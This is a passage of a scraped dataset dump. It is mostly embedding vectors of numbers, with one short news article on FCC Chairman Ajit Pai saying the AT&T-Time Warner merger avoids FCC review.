-0.012738688848912716,0.03907069191336632,-0.005442458670586348,0.05570968613028526,-0.0374874472618103,-0.050370700657367706,-0.014276986010372639,0.0851968452334404,0.021769527345895767,0.000782811432145536,-0.007630069740116596,0.024740096181631088,-0.04091160371899605,-0.016729235649108887,-0.00937191303819418,-0.0906146764755249,0.0006110352696850896,0.07176801562309265,0.017673522233963013,-0.11480532586574554,-0.03088131919503212,0.029259059578180313,0.013071700930595398,-0.0550948828458786,-0.05388697236776352,0.030432695522904396,0.04484907165169716,-0.039150916039943695,0.018182994797825813,-0.02559848502278328,-0.00770733505487442,0.011759820394217968,-0.06509044021368027,-0.0354420468211174,-0.06368708610534668,-0.09739671647548676,0.01497536338865757,-0.06089761480689049,0.044065654277801514,-0.04380769282579422,0.023510631173849106,0.054976943880319595,-0.10334523022174835,-0.07837622612714767,0.06439075618982315,-0.01060816366225481,0.026806265115737915,-0.02663378044962883,-0.028557559475302696,0.04615308716893196,0.017247507348656654,0.04997264966368675,-0.00878545455634594,-0.05366562679409981,-0.07266215980052948,-0.1270308643579483,-0.015219714492559433,-0.020194925367832184,0.04073358327150345,0.010249467566609383,0.0069472757168114185,0.009440707974135876,-0.06262672692537308,0.11576167494058609,0.03727297857403755,-0.0165113415569067,0.0027844440191984177,0.048714298754930496,-0.050909414887428284,-0.05913222208619118,-0.0015222219517454505,-0.008695566095411777,-6.116727035987424e-8,-0.0738496407866478,0.028968803584575653,0.04068182036280632,0.1518208384513855,-0.040745776146650314,-0.06171325966715813,0.010226628743112087,0.00986439362168312,0.0027822016272693872,0.03841664642095566,0.0063123758882284164,0.08730821311473846,-0.08421972393989563,-0.09705109894275665,-0.016643764451146126,-0.08430013805627823,-0.02395867370069027,-0.13822777569293976,-0.03361104801297188,0.03712651506066322,0.018678244203329086,-0.01698405295610428,0.021732522174715996,0.0015560720348730683,0.029412616044282913,0.04079195111989975,-0.0007255445816554129,-0.06094897538423538,0.0040791514329612255,-0.02775072678923607,0.04073912650346756,0.09068232774734497,0.04597945883870125,0.013008968904614449,-0.0821349248290062,-0.02378734201192856,-0.006296835374087095,0.011034038849174976,-0.04127780348062515,0.01663912460207939,0.018710242584347725,-0.07213281095027924,0.07732972502708435,-0.004480401985347271,0.06093430891633034,0.05903662368655205,-0.011856232769787312,0.010984051041305065,0.040448155254125595,-0.004980945959687233,-0.062070026993751526,0.0874762237071991,0.07287706434726715,0.10436537861824036,0.00462003517895937,-0.000018149157767766155,-0.029152367264032364,0.08384985476732254,0.031563855707645416,-0.03744559735059738,0.04055209830403328,0.057661980390548706,-0.05245162546634674,-0.016404232010245323],"string":"[\n -0.03672265633940697,\n -0.0004835495783481747,\n 0.0013871716801077127,\n 0.00537482276558876,\n 0.03551249951124191,\n 0.030717935413122177,\n 0.028023457154631615,\n -0.06856250762939453,\n -0.04367855191230774,\n -0.06534157693386078,\n -0.018413186073303223,\n 0.03516208752989769,\n -0.005688359495252371,\n 0.09264229238033295,\n -0.025375740602612495,\n 0.011758442036807537,\n -0.060592640191316605,\n -0.04297846183180809,\n -0.03121691383421421,\n -0.001402229187078774,\n -0.034134913235902786,\n -0.003037465736269951,\n 0.1282140165567398,\n -0.0502777136862278,\n 0.04339543730020523,\n 0.03341258689761162,\n 0.0002878537925425917,\n 0.011992225423455238,\n -0.06347844749689102,\n 0.03976566344499588,\n -0.05182843282818794,\n 0.016788220033049583,\n -0.04409365728497505,\n -0.0993313416838646,\n 0.07308197021484375,\n 0.030740348622202873,\n 0.1508769541978836,\n 0.05415496975183487,\n 0.07092143595218658,\n -0.0823480561375618,\n -0.06630314141511917,\n -0.047131020575761795,\n 0.04469230771064758,\n 0.05230579525232315,\n -0.04990192502737045,\n 0.03691048175096512,\n -0.004676224198192358,\n -0.0028381701558828354,\n -0.04411432892084122,\n 0.04238284006714821,\n 0.005378847476094961,\n 0.013819679617881775,\n 0.06902371346950531,\n -0.03719869628548622,\n 0.024985847994685173,\n -0.016952261328697205,\n 0.0037901338655501604,\n 0.08103320002555847,\n -0.041681233793497086,\n -0.016626203432679176,\n -0.10167163610458374,\n -0.02213151752948761,\n -0.029340842738747597,\n 0.025005102157592773,\n -0.03892597183585167,\n -0.01863526739180088,\n -0.016124729067087173,\n 0.0848924070596695,\n 0.02895863726735115,\n 0.02885235659778118,\n -0.050711024552583694,\n 0.061818383634090424,\n 0.04066899046301842,\n -0.07472562044858932,\n -0.06381764262914658,\n 0.009139865636825562,\n 0.023012923076748848,\n 0.05068567395210266,\n 0.03581325709819794,\n -0.0017147863982245326,\n 0.0349218025803566,\n 0.10531260818243027,\n 0.1512337177991867,\n 0.0385797880589962,\n -0.033172935247421265,\n -0.06546144187450409,\n 0.02169593796133995,\n -0.07824314385652542,\n -0.0007450432749465108,\n 0.039312683045864105,\n -0.030373547226190567,\n -0.06202295422554016,\n 0.01927361451089382,\n 0.048723254352808,\n 0.060257766395807266,\n -0.01375963818281889,\n 0.03874564543366432,\n 0.11564289778470993,\n -0.03694932535290718,\n 0.03749311342835426,\n 0.03321058675646782,\n 0.03748644143342972,\n 0.00258794822730124,\n 0.02905462123453617,\n 0.06804266571998596,\n -0.03303397074341774,\n -0.03096841461956501,\n 0.003962759859859943,\n 0.0299169160425663,\n -0.013187291100621223,\n -0.024849260225892067,\n 0.07863130420446396,\n -0.034200556576251984,\n -0.055468861013650894,\n 0.016343239694833755,\n -0.010837430134415627,\n 0.0027220819611102343,\n -0.041727542877197266,\n -0.03878206014633179,\n 0.1395915448665619,\n -0.015471461229026318,\n 0.06010664254426956,\n -0.00339123560115695,\n 0.11361504346132278,\n -0.06401346623897552,\n 0.08769133687019348,\n 0.09175443649291992,\n 1.0695467694761863e-33,\n 0.0920182392001152,\n -0.05822966620326042,\n -0.07838783413171768,\n 0.06952814757823944,\n 0.07431711256504059,\n 0.009406576864421368,\n -0.036698117852211,\n 0.043028008192777634,\n 0.013016750104725361,\n -0.06620107591152191,\n -0.031465571373701096,\n -0.020779365673661232,\n 0.000840845750644803,\n -0.011975361034274101,\n -0.07961413264274597,\n -0.03810644894838333,\n -0.028049491345882416,\n 0.02426891401410103,\n 0.01882283203303814,\n -0.07053027302026749,\n 0.004220183007419109,\n -0.038174185901880264,\n 0.022099465131759644,\n -0.01386320497840643,\n -0.03358801454305649,\n 0.04293563961982727,\n -0.003900940530002117,\n 0.06155795976519585,\n 0.0031177711207419634,\n 0.034695159643888474,\n -0.018593624234199524,\n -0.0118324039503932,\n -0.001621066709049046,\n -0.05425218120217323,\n -0.059160903096199036,\n -0.0044722300954163074,\n 0.06281454116106033,\n -0.07544125616550446,\n 0.02488906867802143,\n -0.10812543332576752,\n 0.012957720085978508,\n 0.032416652888059616,\n -0.010779423639178276,\n -0.08244966715574265,\n -0.005843698512762785,\n 0.00005479173705680296,\n -0.06374374777078629,\n 0.011949700303375721,\n -0.029965389519929886,\n -0.0013245389563962817,\n -0.03648873046040535,\n 0.015188251622021198,\n -0.08640971034765244,\n 0.031148500740528107,\n -0.08999254554510117,\n -0.011234648525714874,\n 0.0448320247232914,\n -0.019121414050459862,\n 0.0005358451162464917,\n -0.04681393504142761,\n 0.045909471809864044,\n 0.05223887413740158,\n 0.020088158547878265,\n 0.03609664738178253,\n -0.08274274319410324,\n -0.03143779933452606,\n -0.05849737301468849,\n -0.02682132087647915,\n 0.013345749117434025,\n -0.10716445744037628,\n -0.08499789983034134,\n 0.008726485073566437,\n -0.03679567575454712,\n -0.11181578040122986,\n 0.010157205164432526,\n 0.026971202343702316,\n 0.09326989203691483,\n 0.0271509550511837,\n -0.04709508642554283,\n 0.0024946886114776134,\n 0.03505057096481323,\n 0.052817635238170624,\n -0.08144351094961166,\n -0.005428739357739687,\n -0.04969509690999985,\n -0.07422787696123123,\n 0.012549360282719135,\n -0.10257325321435928,\n -0.04478643462061882,\n 0.031674329191446304,\n -0.049296487122774124,\n 0.021945614367723465,\n 0.002951538423076272,\n -0.0793202817440033,\n -0.011586264707148075,\n -5.0886731677234346e-33,\n 0.06760691851377487,\n 0.01047605462372303,\n 0.029737701639533043,\n -0.09902481734752655,\n -0.02862389199435711,\n -0.03775063157081604,\n -0.000017493270206614397,\n 0.04344954341650009,\n 0.07465511560440063,\n 0.03337465599179268,\n -0.043872833251953125,\n 0.0021711017470806837,\n 0.0023085838183760643,\n 0.031452108174562454,\n -0.05574151873588562,\n 0.017244260758161545,\n -0.038005582988262177,\n -0.008407899178564548,\n 0.03489784523844719,\n 0.04039293900132179,\n 0.07025018334388733,\n 0.0305072870105505,\n -0.03340744599699974,\n -0.012738688848912716,\n 0.03907069191336632,\n -0.005442458670586348,\n 0.05570968613028526,\n -0.0374874472618103,\n -0.050370700657367706,\n -0.014276986010372639,\n 0.0851968452334404,\n 0.021769527345895767,\n 0.000782811432145536,\n -0.007630069740116596,\n 0.024740096181631088,\n -0.04091160371899605,\n -0.016729235649108887,\n -0.00937191303819418,\n -0.0906146764755249,\n 0.0006110352696850896,\n 0.07176801562309265,\n 0.017673522233963013,\n -0.11480532586574554,\n -0.03088131919503212,\n 0.029259059578180313,\n 0.013071700930595398,\n -0.0550948828458786,\n -0.05388697236776352,\n 0.030432695522904396,\n 0.04484907165169716,\n -0.039150916039943695,\n 0.018182994797825813,\n -0.02559848502278328,\n -0.00770733505487442,\n 0.011759820394217968,\n -0.06509044021368027,\n -0.0354420468211174,\n -0.06368708610534668,\n -0.09739671647548676,\n 0.01497536338865757,\n -0.06089761480689049,\n 0.044065654277801514,\n -0.04380769282579422,\n 0.023510631173849106,\n 0.054976943880319595,\n -0.10334523022174835,\n -0.07837622612714767,\n 0.06439075618982315,\n -0.01060816366225481,\n 0.026806265115737915,\n -0.02663378044962883,\n -0.028557559475302696,\n 0.04615308716893196,\n 0.017247507348656654,\n 0.04997264966368675,\n -0.00878545455634594,\n -0.05366562679409981,\n -0.07266215980052948,\n -0.1270308643579483,\n -0.015219714492559433,\n -0.020194925367832184,\n 0.04073358327150345,\n 0.010249467566609383,\n 0.0069472757168114185,\n 0.009440707974135876,\n -0.06262672692537308,\n 0.11576167494058609,\n 0.03727297857403755,\n -0.0165113415569067,\n 0.0027844440191984177,\n 0.048714298754930496,\n -0.050909414887428284,\n -0.05913222208619118,\n -0.0015222219517454505,\n -0.008695566095411777,\n -6.116727035987424e-8,\n -0.0738496407866478,\n 0.028968803584575653,\n 0.04068182036280632,\n 0.1518208384513855,\n -0.040745776146650314,\n -0.06171325966715813,\n 0.010226628743112087,\n 0.00986439362168312,\n 0.0027822016272693872,\n 0.03841664642095566,\n 0.0063123758882284164,\n 0.08730821311473846,\n -0.08421972393989563,\n -0.09705109894275665,\n -0.016643764451146126,\n -0.08430013805627823,\n -0.02395867370069027,\n -0.13822777569293976,\n -0.03361104801297188,\n 0.03712651506066322,\n 0.018678244203329086,\n -0.01698405295610428,\n 0.021732522174715996,\n 0.0015560720348730683,\n 0.029412616044282913,\n 0.04079195111989975,\n -0.0007255445816554129,\n -0.06094897538423538,\n 0.0040791514329612255,\n -0.02775072678923607,\n 0.04073912650346756,\n 0.09068232774734497,\n 0.04597945883870125,\n 0.013008968904614449,\n -0.0821349248290062,\n -0.02378734201192856,\n -0.006296835374087095,\n 0.011034038849174976,\n -0.04127780348062515,\n 0.01663912460207939,\n 0.018710242584347725,\n -0.07213281095027924,\n 0.07732972502708435,\n -0.004480401985347271,\n 0.06093430891633034,\n 0.05903662368655205,\n -0.011856232769787312,\n 0.010984051041305065,\n 0.040448155254125595,\n -0.004980945959687233,\n -0.062070026993751526,\n 0.0874762237071991,\n 0.07287706434726715,\n 0.10436537861824036,\n 0.00462003517895937,\n -0.000018149157767766155,\n -0.029152367264032364,\n 0.08384985476732254,\n 0.031563855707645416,\n -0.03744559735059738,\n 0.04055209830403328,\n 0.057661980390548706,\n -0.05245162546634674,\n -0.016404232010245323\n]"}}},{"rowIdx":1284,"cells":{"text":{"kind":"string","value":"Federal Communications Commission Chairman Ajit Pai said on Monday that he does not expect the AT&T-Time Warner deal to be subject to his agency’s approval.\n\nSpeaking to the Wall Street Journal at the Mobile World Congress in Barcelona, Spain, Pai said that AT&T's purchase of Time Warner has been structured in a way that would allow it to avoid FCC scrutiny by not transferring any airwave licenses between the two companies.\n\n“That is the regulatory hook for FCC review,” Pai said. “My understanding is that the deal won’t be presented to the commission.”\n\nADVERTISEMENT\n\nIn an SEC filing last month, Time Warner revealed that it would not be transferring any of its FCC licenses to AT&T as part of the $85 billion merger.\n\nFCC Commissioner Mignon Clyburn, the lone Democrat on the panel, has called for the deal to be scrutinized by the FCC.\n\n\"To put things in perspective, this transaction is worth $16 billion more than the Comcast/NBC-U and the subsequently abandoned AT&T/T-Mobile deals combined,\" Clyburn said in a statement. \"This Commission has both the authority and responsibility to thoroughly examine this transaction and we should not shrink from our responsibilities under the laws we are responsible for implementing”.\n\nThe deal will still have to be cleared by the Justice Department.\n\nPresident Trump came out against the deal when it was first announced while he was on the campaign trail last year, but he's since indicated that he is open to changing his position.\n\n\"I have been on the record in the past of saying it's too big and we have to keep competition,” he told Axios last month. “So, but other than that, I haven't, you know, I haven't seen any of the facts, yet. I'm sure that will be presented to me and to the people within government.\""},"embedding":{"kind":"list like","value":[-0.04618615284562111,0.01941857300698757,-0.02419007569551468,-0.022756576538085938,0.0088518550619483,0.012210957705974579,0.08628470450639725,-0.026745812967419624,0.04319627955555916,-0.0700484961271286,0.015950461849570274,0.05729890987277031,-0.02440289407968521,0.01068124920129776,0.02070626989006996,-0.016340136528015137,0.037654243409633636,-0.09542066603899002,0.006709615234285593,0.017979629337787628,-0.014782123267650604,0.008026039227843285,-0.015759127214550972,-0.03210025653243065,0.03205416351556778,-0.051658228039741516,-0.1313234567642212,-0.036428406834602356,-0.03739210590720177,-0.02508106268942356,-0.04151371121406555,0.01270982250571251,-0.008929957635700703,-0.011862391605973244,-0.011665375903248787,-0.03057810105383396,-0.0311720110476017,0.05623933672904968,0.09343130886554718,0.004139757249504328,0.11619303375482559,-0.043516725301742554,-0.15453919768333435,0.06288789957761765,-0.02887710928916931,-0.01905202306807041,0.08744765818119049,0.004910830408334732,-0.06760504841804504,0.055000800639390945,0.02341446280479431,0.038563769310712814,0.01900016888976097,-0.060797397047281265,-0.03378557041287422,0.04369889944791794,0.011019144207239151,0.07219165563583374,0.045852381736040115,0.06634441018104553,0.023564644157886505,-0.005846809130162001,-0.0428863987326622,0.09581633657217026,0.07027547806501389,-0.01574358344078064,-0.03838947415351868,-0.0056817797012627125,-0.07619789987802505,-0.08830785751342773,0.04877536743879318,0.00218805274926126,-0.02061697468161583,0.05329141765832901,0.06089005991816521,0.05298982188105583,0.049040284007787704,0.0759006217122078,0.05271032825112343,0.009120617993175983,0.006272787693887949,-0.03702186420559883,-0.06514061242341995,-0.06315527111291885,0.0637790784239769,-0.01162214856594801,-0.04176592454314232,0.09742475301027298,0.009941262193024158,-0.04325580224394798,-0.01391382422298193,0.021711697801947594,0.0378640852868557,0.0018313266336917877,0.01813947781920433,0.0438871830701828,-0.0531606525182724,-0.013268006965517998,0.011485887691378593,0.005571977701038122,-0.020371071994304657,0.009565936401486397,-0.06047333776950836,0.006547804921865463,-0.04444393143057823,-0.06889721751213074,0.005580092314630747,-0.02696589194238186,0.044498518109321594,0.06004532426595688,-0.05991760268807411,0.03134012594819069,-0.01595531962811947,-0.02584592066705227,0.03148132935166359,0.0798826739192009,-0.03659446910023689,0.06401559710502625,0.14937078952789307,-0.11374356597661972,-0.05752532556653023,0.022261682897806168,-0.05346409231424332,0.037302423268556595,0.05409644544124603,0.02372477576136589,-0.012753529474139214,8.390541841280213e-34,-0.006088690832257271,0.11141771078109741,-0.10258273035287857,-0.005266500636935234,0.02352697215974331,0.06505288928747177,0.08164822310209274,-0.0010364546906203032,-0.04231059551239014,0.1173420324921608,-0.09786263853311539,-0.004973945673555136,-0.02996854856610298,0.009517881087958813,-0.03404461592435837,-0.04579705744981766,-0.016170453280210495,-0.05511423945426941,0.07716168463230133,-0.045554764568805695,0.017725517973303795,0.07905742526054382,0.0023602305445820093,0.0698520690202713,0.023640837520360947,-0.07939130812883377,-0.06927545368671417,-0.05725942924618721,0.006403726991266012,0.026484055444598198,-0.10321564227342606,-0.024252645671367645,0.047662537544965744,0.03148561343550682,0.028622323647141457,-0.01100078970193863,-0.05780777335166931,-0.003197651356458664,-0.007320795673877001,-0.01927466131746769,0.012572992593050003,0.05376153811812401,-0.09965616464614868,0.010797896422445774,0.01844218745827675,-0.026375629007816315,-0.004141558893024921,-0.014936823397874832,-0.019830698147416115,0.024526963010430336,0.00015545538917649537,0.050101928412914276,0.011174258776009083,-0.07407448440790176,-0.00039645328070037067,0.025000067427754402,0.03596099093556404,0.008185476064682007,0.03738730400800705,0.03775106370449066,0.024456558749079704,0.018897822126746178,-0.055990446358919144,0.05590961501002312,-0.08472944796085358,0.03967268392443657,-0.0024098127614706755,-0.019553260877728462,-0.0024871826171875,-0.00471927085891366,0.02931552194058895,-0.017486920580267906,0.009848760440945625,0.008244293741881847,-0.027155043557286263,-0.030843133106827736,-0.0007698130793869495,0.05980459228157997,0.030972065404057503,-0.032952792942523956,0.0226938184350729,-0.003407879499718547,0.1321532130241394,-0.03642098233103752,0.03680932894349098,-0.017529062926769257,0.054632727056741714,0.006045611575245857,0.03206472098827362,0.01588406227529049,-0.028292793780565262,0.051812950521707535,-0.005710989702492952,0.06451551616191864,0.08492915332317352,-1.9763195301161487e-33,-0.10641289502382278,-0.05453411489725113,0.0011373042361810803,-0.08755173534154892,-0.09955570846796036,-0.0705840215086937,-0.027336331084370613,0.043086592108011246,0.020081263035535812,-0.049504637718200684,-0.013638585805892944,-0.07669874280691147,-0.0205922182649374,-0.033648740500211716,0.01680961437523365,-0.05435126647353172,0.008165535517036915,-0.008421210572123528,0.03232557699084282,-0.000983751961030066,0.0651344507932663,0.01684100367128849,0.0006859510904178023,0.1005442813038826,-0.023039959371089935,-0.008020603097975254,0.08176379650831223,-0.018688349053263664,0.05714994668960571,0.07499437034130096,-0.08488909900188446,-0.10146086663007736,-0.012722906656563282,0.06348278373479843,0.06179226189851761,0.028361499309539795,0.04968486726284027,0.07562726736068726,-0.009419167414307594,-0.04795709252357483,0.053845133632421494,-0.01379314437508583,0.00591464526951313,-0.02443886362016201,-0.09142794460058212,0.05877815559506416,0.01438872143626213,-0.052435703575611115,-0.08138833194971085,-0.008725429885089397,0.017726324498653412,-0.027628101408481598,0.11323995888233185,-0.026775721460580826,-0.06936806440353394,0.04753470420837402,0.11834230273962021,0.012385436333715916,0.03753229230642319,-0.08733641356229782,0.08595706522464752,0.04397464916110039,-0.021299045532941818,-0.03964395821094513,0.05150388553738594,0.030790723860263824,0.012738472782075405,-0.1090400293469429,0.009497074410319328,0.01884562335908413,-0.06378979980945587,-0.1230948343873024,-0.10100869089365005,-0.07510462403297424,0.017724396660923958,0.06473834067583084,-0.06354428827762604,0.07032191753387451,-0.034098390489816666,0.03854762017726898,0.020168108865618706,0.1048651710152626,-0.008921398781239986,-0.02914608269929886,0.06243716925382614,0.009168112650513649,0.020775893703103065,-0.10711897909641266,-0.02288331650197506,-0.01887913979589939,-0.034672681242227554,-0.007209443487226963,-0.00870801042765379,0.010276350192725658,0.04138431325554848,-5.568053040860832e-8,0.011446175165474415,-0.02692307159304619,-0.041103899478912354,-0.049492157995700836,0.05066494643688202,-0.05448884144425392,0.031960055232048035,-0.03687553107738495,0.03331939876079559,-0.00012161315680714324,0.048318639397621155,-0.013488074764609337,-0.07106836885213852,0.027001965790987015,-0.032560739666223526,-0.031222742050886154,-0.05289669334888458,-0.0708620548248291,0.023040451109409332,0.031035397201776505,-0.04173183813691139,0.043151967227458954,0.03953193128108978,0.01357965636998415,0.02170797437429428,0.02353391982614994,-0.03124171681702137,0.06542929261922836,0.10012777149677277,0.05626840889453888,-0.04247685521841049,-0.04109632223844528,-0.03740078583359718,0.007987994700670242,-0.07171722501516342,-0.060766443610191345,0.005692532751709223,-0.04703443869948387,0.0018464353634044528,0.10069572180509567,-0.004682826343923807,0.03239743039011955,0.00011438976798672229,0.031011270359158516,0.018810518085956573,-0.045924294739961624,-0.08897583931684494,-0.05442652106285095,0.10997610539197922,-0.04264248162508011,0.023974083364009857,0.025523915886878967,-0.02488042041659355,-0.07678986340761185,-0.019055837765336037,-0.10294568538665771,0.015356098301708698,-0.00841111782938242,-0.01640995591878891,-0.019655423238873482,-0.05703156441450119,-0.05178717523813248,0.07878272980451584,-0.08005170524120331],"string":"[\n -0.04618615284562111,\n 0.01941857300698757,\n -0.02419007569551468,\n -0.022756576538085938,\n 0.0088518550619483,\n 0.012210957705974579,\n 0.08628470450639725,\n -0.026745812967419624,\n 0.04319627955555916,\n -0.0700484961271286,\n 0.015950461849570274,\n 0.05729890987277031,\n -0.02440289407968521,\n 0.01068124920129776,\n 0.02070626989006996,\n -0.016340136528015137,\n 0.037654243409633636,\n -0.09542066603899002,\n 0.006709615234285593,\n 0.017979629337787628,\n -0.014782123267650604,\n 0.008026039227843285,\n -0.015759127214550972,\n -0.03210025653243065,\n 0.03205416351556778,\n -0.051658228039741516,\n -0.1313234567642212,\n -0.036428406834602356,\n -0.03739210590720177,\n -0.02508106268942356,\n -0.04151371121406555,\n 0.01270982250571251,\n -0.008929957635700703,\n -0.011862391605973244,\n -0.011665375903248787,\n -0.03057810105383396,\n -0.0311720110476017,\n 0.05623933672904968,\n 0.09343130886554718,\n 0.004139757249504328,\n 0.11619303375482559,\n -0.043516725301742554,\n -0.15453919768333435,\n 0.06288789957761765,\n -0.02887710928916931,\n -0.01905202306807041,\n 0.08744765818119049,\n 0.004910830408334732,\n -0.06760504841804504,\n 0.055000800639390945,\n 0.02341446280479431,\n 0.038563769310712814,\n 0.01900016888976097,\n -0.060797397047281265,\n -0.03378557041287422,\n 0.04369889944791794,\n 0.011019144207239151,\n 0.07219165563583374,\n 0.045852381736040115,\n 0.06634441018104553,\n 0.023564644157886505,\n -0.005846809130162001,\n -0.0428863987326622,\n 0.09581633657217026,\n 0.07027547806501389,\n -0.01574358344078064,\n -0.03838947415351868,\n -0.0056817797012627125,\n -0.07619789987802505,\n -0.08830785751342773,\n 0.04877536743879318,\n 0.00218805274926126,\n -0.02061697468161583,\n 0.05329141765832901,\n 0.06089005991816521,\n 0.05298982188105583,\n 0.049040284007787704,\n 0.0759006217122078,\n 0.05271032825112343,\n 0.009120617993175983,\n 0.006272787693887949,\n -0.03702186420559883,\n -0.06514061242341995,\n -0.06315527111291885,\n 0.0637790784239769,\n -0.01162214856594801,\n -0.04176592454314232,\n 0.09742475301027298,\n 0.009941262193024158,\n -0.04325580224394798,\n -0.01391382422298193,\n 0.021711697801947594,\n 0.0378640852868557,\n 0.0018313266336917877,\n 0.01813947781920433,\n 0.0438871830701828,\n -0.0531606525182724,\n -0.013268006965517998,\n 0.011485887691378593,\n 0.005571977701038122,\n -0.020371071994304657,\n 0.009565936401486397,\n -0.06047333776950836,\n 0.006547804921865463,\n -0.04444393143057823,\n -0.06889721751213074,\n 0.005580092314630747,\n -0.02696589194238186,\n 0.044498518109321594,\n 0.06004532426595688,\n -0.05991760268807411,\n 0.03134012594819069,\n -0.01595531962811947,\n -0.02584592066705227,\n 0.03148132935166359,\n 0.0798826739192009,\n -0.03659446910023689,\n 0.06401559710502625,\n 0.14937078952789307,\n -0.11374356597661972,\n -0.05752532556653023,\n 0.022261682897806168,\n -0.05346409231424332,\n 0.037302423268556595,\n 0.05409644544124603,\n 0.02372477576136589,\n -0.012753529474139214,\n 8.390541841280213e-34,\n -0.006088690832257271,\n 0.11141771078109741,\n -0.10258273035287857,\n -0.005266500636935234,\n 0.02352697215974331,\n 0.06505288928747177,\n 0.08164822310209274,\n -0.0010364546906203032,\n -0.04231059551239014,\n 0.1173420324921608,\n -0.09786263853311539,\n -0.004973945673555136,\n -0.02996854856610298,\n 0.009517881087958813,\n -0.03404461592435837,\n -0.04579705744981766,\n -0.016170453280210495,\n -0.05511423945426941,\n 0.07716168463230133,\n -0.045554764568805695,\n 0.017725517973303795,\n 0.07905742526054382,\n 0.0023602305445820093,\n 0.0698520690202713,\n 0.023640837520360947,\n -0.07939130812883377,\n -0.06927545368671417,\n -0.05725942924618721,\n 0.006403726991266012,\n 0.026484055444598198,\n -0.10321564227342606,\n -0.024252645671367645,\n 0.047662537544965744,\n 0.03148561343550682,\n 0.028622323647141457,\n -0.01100078970193863,\n -0.05780777335166931,\n -0.003197651356458664,\n -0.007320795673877001,\n -0.01927466131746769,\n 0.012572992593050003,\n 0.05376153811812401,\n -0.09965616464614868,\n 0.010797896422445774,\n 0.01844218745827675,\n -0.026375629007816315,\n -0.004141558893024921,\n -0.014936823397874832,\n -0.019830698147416115,\n 0.024526963010430336,\n 0.00015545538917649537,\n 0.050101928412914276,\n 0.011174258776009083,\n -0.07407448440790176,\n -0.00039645328070037067,\n 0.025000067427754402,\n 0.03596099093556404,\n 0.008185476064682007,\n 0.03738730400800705,\n 0.03775106370449066,\n 0.024456558749079704,\n 0.018897822126746178,\n -0.055990446358919144,\n 0.05590961501002312,\n -0.08472944796085358,\n 0.03967268392443657,\n -0.0024098127614706755,\n -0.019553260877728462,\n -0.0024871826171875,\n -0.00471927085891366,\n 0.02931552194058895,\n -0.017486920580267906,\n 0.009848760440945625,\n 0.008244293741881847,\n -0.027155043557286263,\n -0.030843133106827736,\n -0.0007698130793869495,\n 0.05980459228157997,\n 0.030972065404057503,\n -0.032952792942523956,\n 0.0226938184350729,\n -0.003407879499718547,\n 0.1321532130241394,\n -0.03642098233103752,\n 0.03680932894349098,\n -0.017529062926769257,\n 0.054632727056741714,\n 0.006045611575245857,\n 0.03206472098827362,\n 0.01588406227529049,\n -0.028292793780565262,\n 0.051812950521707535,\n -0.005710989702492952,\n 0.06451551616191864,\n 0.08492915332317352,\n -1.9763195301161487e-33,\n -0.10641289502382278,\n -0.05453411489725113,\n 0.0011373042361810803,\n -0.08755173534154892,\n -0.09955570846796036,\n -0.0705840215086937,\n -0.027336331084370613,\n 0.043086592108011246,\n 0.020081263035535812,\n -0.049504637718200684,\n -0.013638585805892944,\n -0.07669874280691147,\n -0.0205922182649374,\n -0.033648740500211716,\n 0.01680961437523365,\n -0.05435126647353172,\n 0.008165535517036915,\n -0.008421210572123528,\n 0.03232557699084282,\n -0.000983751961030066,\n 0.0651344507932663,\n 0.01684100367128849,\n 0.0006859510904178023,\n 0.1005442813038826,\n -0.023039959371089935,\n -0.008020603097975254,\n 0.08176379650831223,\n -0.018688349053263664,\n 0.05714994668960571,\n 0.07499437034130096,\n -0.08488909900188446,\n -0.10146086663007736,\n -0.012722906656563282,\n 0.06348278373479843,\n 0.06179226189851761,\n 0.028361499309539795,\n 0.04968486726284027,\n 0.07562726736068726,\n -0.009419167414307594,\n -0.04795709252357483,\n 0.053845133632421494,\n -0.01379314437508583,\n 0.00591464526951313,\n -0.02443886362016201,\n -0.09142794460058212,\n 0.05877815559506416,\n 0.01438872143626213,\n -0.052435703575611115,\n -0.08138833194971085,\n -0.008725429885089397,\n 0.017726324498653412,\n -0.027628101408481598,\n 0.11323995888233185,\n -0.026775721460580826,\n -0.06936806440353394,\n 0.04753470420837402,\n 0.11834230273962021,\n 0.012385436333715916,\n 0.03753229230642319,\n -0.08733641356229782,\n 0.08595706522464752,\n 0.04397464916110039,\n -0.021299045532941818,\n -0.03964395821094513,\n 0.05150388553738594,\n 0.030790723860263824,\n 0.012738472782075405,\n -0.1090400293469429,\n 0.009497074410319328,\n 0.01884562335908413,\n -0.06378979980945587,\n -0.1230948343873024,\n -0.10100869089365005,\n -0.07510462403297424,\n 0.017724396660923958,\n 0.06473834067583084,\n -0.06354428827762604,\n 0.07032191753387451,\n -0.034098390489816666,\n 0.03854762017726898,\n 0.020168108865618706,\n 0.1048651710152626,\n -0.008921398781239986,\n -0.02914608269929886,\n 0.06243716925382614,\n 0.009168112650513649,\n 0.020775893703103065,\n -0.10711897909641266,\n -0.02288331650197506,\n -0.01887913979589939,\n -0.034672681242227554,\n -0.007209443487226963,\n -0.00870801042765379,\n 0.010276350192725658,\n 0.04138431325554848,\n -5.568053040860832e-8,\n 0.011446175165474415,\n -0.02692307159304619,\n -0.041103899478912354,\n -0.049492157995700836,\n 0.05066494643688202,\n -0.05448884144425392,\n 0.031960055232048035,\n -0.03687553107738495,\n 0.03331939876079559,\n -0.00012161315680714324,\n 0.048318639397621155,\n -0.013488074764609337,\n -0.07106836885213852,\n 0.027001965790987015,\n -0.032560739666223526,\n -0.031222742050886154,\n -0.05289669334888458,\n -0.0708620548248291,\n 0.023040451109409332,\n 0.031035397201776505,\n -0.04173183813691139,\n 0.043151967227458954,\n 0.03953193128108978,\n 0.01357965636998415,\n 0.02170797437429428,\n 0.02353391982614994,\n -0.03124171681702137,\n 0.06542929261922836,\n 0.10012777149677277,\n 0.05626840889453888,\n -0.04247685521841049,\n -0.04109632223844528,\n -0.03740078583359718,\n 0.007987994700670242,\n -0.07171722501516342,\n -0.060766443610191345,\n 0.005692532751709223,\n -0.04703443869948387,\n 0.0018464353634044528,\n 0.10069572180509567,\n -0.004682826343923807,\n 0.03239743039011955,\n 0.00011438976798672229,\n 0.031011270359158516,\n 0.018810518085956573,\n -0.045924294739961624,\n -0.08897583931684494,\n -0.05442652106285095,\n 0.10997610539197922,\n -0.04264248162508011,\n 0.023974083364009857,\n 0.025523915886878967,\n -0.02488042041659355,\n -0.07678986340761185,\n -0.019055837765336037,\n -0.10294568538665771,\n 0.015356098301708698,\n -0.00841111782938242,\n -0.01640995591878891,\n -0.019655423238873482,\n -0.05703156441450119,\n -0.05178717523813248,\n 0.07878272980451584,\n -0.08005170524120331\n]"}}},{"rowIdx":1285,"cells":{"text":{"kind":"string","value":"It’s summer. It’s hot. And all you need right 